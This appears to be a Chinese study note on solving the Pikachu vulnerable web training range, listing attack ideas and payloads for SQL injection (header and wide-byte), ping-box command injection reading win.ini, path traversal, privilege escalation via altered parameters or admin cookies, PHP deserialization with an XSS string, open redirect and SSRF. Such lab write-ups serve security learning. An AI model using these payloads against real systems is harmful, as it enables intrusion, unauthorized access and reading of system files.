皮卡丘靶场打法思路
http消息头payload //' or updatexml(1,concat(0x7e,datebase()),0) or'
//---->宽字节 --->除了英文其他都是占两个字节 (看抓包信息有什么个%号即可)
----> %df 转义后 可以加上单引号 ’ 进行逃逸 后面拼接 or 1=1#
RCE 远程漏洞
----> ping输入框 构建payload (输入Payload: 127.0.0.1 && whoami) windows的系统
----> 查看系统当下路径的文件payload (输入payload: 127.0.0.1 && dir )
----> 查看系统win.ini文件 输入payload (输入payload: 127.0.0.1 && type C:\Windows\win.ini )
|----|
---->远程代码执行
|----> phpinfo(); 一句话木马就可以了
远程文件包含
---->在url中修改对应的参数payload (filename=../../../../../../windows/win.ini)查看Windows系统
---->本地文件包含也是看对应参数修改url
不安全的文件下载
|---->文件通过get请求来下载,没有对其过滤我只要修改url对应参数就可以下载任意文件
越权
|---->水平越权
|---->通过get请求抓吧改name数据重发
|---->垂直越权
|---->利用管理员的cookie可以让普通用户删除和添加用户等
越权总结
|---->水平越权就是用别人的卡
|---->垂直越权就是用一百元买一万元的东西
php反序列化漏洞
|---->payload O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
|---->
|
===》几个魔法函数:
__construct()当一个对象创建时被调用
__destruct()当一个对象销毁时被调用
__toString()当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup将在序列化之后立即被调用
URL不安全重定向
|----> 比如这个网址 http://192.168.127.1/pkq/vul/urlredirect/urlredirect.php?url=i (后面拼接了一个?url=i)
|---->payload // ?url=需要转跳的网站
SSRF
|----> https://blog.csdn.net/qq_42176496/article/details/126708941 (详细教程看网址 和重定向差不多也是修改url)